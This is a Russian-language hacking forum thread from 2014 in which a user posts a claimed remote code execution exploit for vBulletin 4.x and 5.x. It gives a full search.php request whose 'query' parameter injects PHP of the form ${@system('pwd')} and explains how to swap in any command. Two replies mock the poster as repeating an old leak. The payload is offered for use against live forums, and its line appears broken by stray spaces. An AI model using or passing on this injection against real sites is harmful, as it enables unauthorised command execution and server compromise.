Форумы Уязвимость в форумах vBulletin

Discussion in 'Уязвимости CMS/форумов' started by Shellcode, 7 Mar 2014.

  1. Shellcode

    Shellcode Member

    Joined:
    10 Jan 2013
    Messages:
    35
    Likes Received:
    28
    Reputations:
    -5
    На топовый форумах конечно не работает, но на школофорумах вполне. Инфа была слита давно, но тут не было!
    [Информация]
    -Уязвимые версии: vBulletin v4.x.x and 5.х.x
    -Цена на офф. сайте: 7000$ (~245000 рублей)
    -Распространенность на 02.03.2014: 5/5
    -Платформа: PHP
    -Возможности: Shell Upload / Remote Code Execute


    [Продаваемая уязвимость]

    Code:
    search.php?ajax=0&beforeafter=after&childforums=1&exactname=1&exclude=&forumchoice=&nocache=0&query= %24%7b%40system('pwd')%7d&quicksearch=0&replyless=0&replylimit=0&saveprefs=1&searchdate=0&searchthre adid=0&searchtype=1&searchuser=1&showposts=0&sortby=rank&sortorder=descending&starteronly=0&tag=17&t itleonly=0&userid=0
    
    # "query" param
    # php code to inject : ${@system('put command here')}


    ВАЖНО, для того что-бы юзать данный шел нужно иметь знания по PHP
     
  2. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    575
    Likes Received:
    149
    Reputations:
    94
    >для того что-бы юзать данный шел
    Чего?
    На самом-то деле об этой уязвимости уже все знают.
    Её слили ещё месяц назад с 1337day.
    Да и прежде чем копипастить, можно было убрать очепятки.
    И для уязвимостей vB есть тема.
     
    #2 MaxFast, 7 Mar 2014
    Last edited: 7 Mar 2014
  3. altblitz

    altblitz Elder - Старейшина

    Joined:
    5 Jun 2009
    Messages:
    3,694
    Likes Received:
    3,149
    Reputations:
    236
    и без примеров снятых таких образом форумов?

    порисовался мальчик своей крутизной ))